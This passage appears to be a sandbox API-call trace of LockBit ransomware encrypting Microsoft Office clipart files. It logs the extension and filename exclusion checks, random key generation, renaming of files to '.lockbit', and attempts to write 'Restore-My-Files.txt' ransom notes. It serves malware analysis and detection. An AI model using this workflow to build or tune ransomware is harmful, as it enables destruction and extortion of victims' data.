lpString2=".GIF") returned -1 [0180.425] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.426] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.426] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="ntldr", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01300_.GIF") returned -1 [0180.427] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01300_.GIF") returned -1 [0180.427] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.427] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF") returned=".GIF" [0180.427] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.427] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.427] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.428] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.428] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.428] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF.lockbit") returned 72 [0180.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01300_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0180.429] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.430] malloc (_Size=0x40068) returned 0x3f70048 [0180.430] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=592) returned 1 [0180.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0180.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0180.431] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0180.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.432] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.432] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.450] free (_Block=0x1fa2ed8) [0180.450] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01300_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.450] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.450] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.450] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74896000, ftCreationTime.dwHighDateTime=0x1bd4e67, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74896000, ftLastWriteTime.dwHighDateTime=0x1bd4e67, nFileSizeHigh=0x0, nFileSizeLow=0x2a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01301_.GIF", cAlternateFileName="")) returned 1 [0180.451] lstrcmpiW (lpString1=".", lpString2="WB01301_.GIF") returned -1 [0180.451] lstrcmpiW (lpString1="..", lpString2="WB01301_.GIF") returned -1 [0180.451] PathFindExtensionW (pszPath="WB01301_.GIF") returned=".GIF" [0180.451] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.452] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.452] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.453] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.453] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.453] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="ntldr", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01301_.GIF") returned -1 [0180.453] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01301_.GIF") returned -1 [0180.454] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.454] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF") returned=".GIF" [0180.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.454] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.454] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.455] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.455] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF.lockbit") returned 72 [0180.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01301_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.456] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0180.456] malloc (_Size=0x40068) returned 0x3e70008 [0180.456] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=681) returned 1 [0180.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0180.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0180.458] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0180.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0180.458] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0180.459] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0180.459] malloc (_Size=0xa6) returned 0x1fa2ed8 [0180.459] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0180.465] free (_Block=0x1fa2ed8) [0180.465] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01301_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0180.466] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0180.466] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0180.466] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7a0ea00, ftCreationTime.dwHighDateTime=0x1bd4e4a, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc7a0ea00, ftLastWriteTime.dwHighDateTime=0x1bd4e4a, nFileSizeHigh=0x0, nFileSizeLow=0x2076, dwReserved0=0x0, dwReserved1=0x0, cFileName="WB01304G.GIF", cAlternateFileName="")) returned 1 [0180.466] lstrcmpiW (lpString1=".", lpString2="WB01304G.GIF") returned -1 [0180.466] lstrcmpiW (lpString1="..", lpString2="WB01304G.GIF") returned -1 [0180.466] PathFindExtensionW (pszPath="WB01304G.GIF") returned=".GIF" [0180.466] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0180.466] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0180.466] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0180.467] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0180.467] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0180.467] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0180.467] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0180.467] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="ntldr", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="bootsect.bak", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="autorun.inf", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="thumbs.db", lpString2="WB01304G.GIF") returned -1 [0180.467] lstrcmpiW (lpString1="iconcache.db", lpString2="WB01304G.GIF") returned -1 [0180.467] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0180.468] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF") returned=".GIF" [0180.468] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0180.468] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0180.468] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0180.468] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF.lockbit") returned 72 [0180.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01304G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01304g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0180.469] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) 